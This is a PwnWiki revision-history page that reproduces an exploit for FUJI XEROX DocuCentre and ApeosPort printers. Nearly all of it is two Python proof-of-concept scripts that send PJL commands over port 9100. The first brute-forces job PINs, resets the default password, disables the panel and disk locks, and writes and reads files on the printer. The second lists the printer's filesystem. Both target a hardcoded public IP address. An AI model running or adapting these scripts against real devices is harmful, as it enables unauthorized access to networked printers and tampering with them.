https://pwnwiki.com/index.php?action=history&feed=atom&title=FUJI_XEROX_DocuCentre-V_3065_Printer_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
FUJI XEROX DocuCentre-V 3065 Printer 遠程命令執行漏洞 - Revision history
2026-04-20T16:23:06Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=FUJI_XEROX_DocuCentre-V_3065_Printer_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=682&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution # Date: 2018-09-05 # Exploit Author: vr_system # Vendor Homepage: https://www.fu..."
2021-03-27T02:48:07Z
<p>Created page with "==EXP== <pre> # Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution # Date: 2018-09-05 # Exploit Author: vr_system # Vendor Homepage: https://www.fu..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution<br />
# Date: 2018-09-05<br />
# Exploit Author: vr_system<br />
# Vendor Homepage: https://www.fujixerox.com.cn/<br />
# Software Link: https://www.fujixerox.com.cn/<br />
# Version: DocuCentre-IV,DocuCentre-VI,DocuCentre-V,ApeosPort-VI,ApeosPort-V<br />
# Tested on: DocuCentre-V 3065,ApeosPort-VI C3371,ApeosPort-V C4475,ApeosPort-V C3375,DocuCentre-VI C2271,ApeosPort-V C5576,DocuCentre-IV C2263,DocuCentre-V C2263,ApeosPort-V 5070<br />
# CVE : N/A<br />
<br />
# POC:Ability to write files to the printer<br />
#!/usr/bin/env python<br />
# -*- coding: UTF-8 -*-<br />
import socket<br />
import time<br />
PJL_START = "\033%-12345X@PJL "<br />
PJL_FINISH = "\033%-12345X\r\n"<br />
<br />
def Buildsocket(ip,port=9100):<br />
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) <br />
sock.settimeout(5)<br />
try:<br />
sock.connect((ip, port))<br />
except:<br />
print "[!*]-ip-%s-can't connect--" % ip<br />
return 'error'<br />
for i in range(500):<br />
print"bypass pin:{0}".format(i)<br />
PJL_INFO_ID = """JOB PASSWORD={0}\r\n""".format(i)<br />
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH <br />
sock.send(DEVICEID) <br />
PJL_INFO_ID = """DEFAULT PASSWORD=0\r\n"""<br />
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH <br />
sock.send(DEVICEID) <br />
<br />
PJL_INFO_ID = """DEFAULT CPLOCK=OFF\r\n"""<br />
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH <br />
sock.send(DEVICEID) <br />
PJL_INFO_ID = """DEFAULT DISKLOCK=OFF\r\n"""<br />
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH <br />
sock.send(DEVICEID) <br />
<br />
PJL_INFO_ID = """FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/test4"\r\n"""<br />
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH <br />
sock.send(DEVICEID) <br />
try:<br />
device = sock.recv(1024)<br />
except:pass<br />
PJL_INFO_ID = """FSUPLOAD NAME="0:/test4" OFFSET=0 SIZE=4\r\n"""<br />
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH <br />
sock.send(DEVICEID) <br />
try:<br />
device = sock.recv(1024)<br />
except:pass<br />
finally:<br />
sock.close()<br />
print "OK"<br />
<br />
if __name__ == '__main__':<br />
ip = "118.42.125.192"<br />
Buildsocket(ip, port=9100)<br />
<br />
# POC:Ability to view files in the printer<br />
##!/usr/bin/env python<br />
# -*- coding: UTF-8 -*-<br />
import socket<br />
PJL_START = "\033%-12345X@PJL "<br />
PJL_FINISH = "\033%-12345X\r\n"<br />
<br />
def Buildsocket(ip, port=9100):<br />
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)<br />
sock.settimeout(5)<br />
try:<br />
sock.connect((ip, port))<br />
except:<br />
print "[!*]-ip-%s-can't connect--" % ip<br />
return 'error'<br />
PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535"""<br />
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH <br />
sock.send(DEVICEID) <br />
try:<br />
device = sock.recv(1024)<br />
except:pass<br />
PJL_INFO_ID = """FSDIRLIST NAME="0:/" ENTRY=1"""<br />
DEVICEID = PJL_START + PJL_INFO_ID + PJL_FINISH<br />
sock.send(DEVICEID) #<br />
try:<br />
device = sock.recv(1024)<br />
except:<br />
return 'No'<br />
print "[!*]-ip-%s-is-ok\r\ndeviceidis-%s" % (str(ip), device)<br />
sock.close()<br />
return 'OK'<br />
if __name__ == '__main__':<br />
Buildsocket("118.42.125.192", port=9100) <br />
</pre></div>
Pwnwiki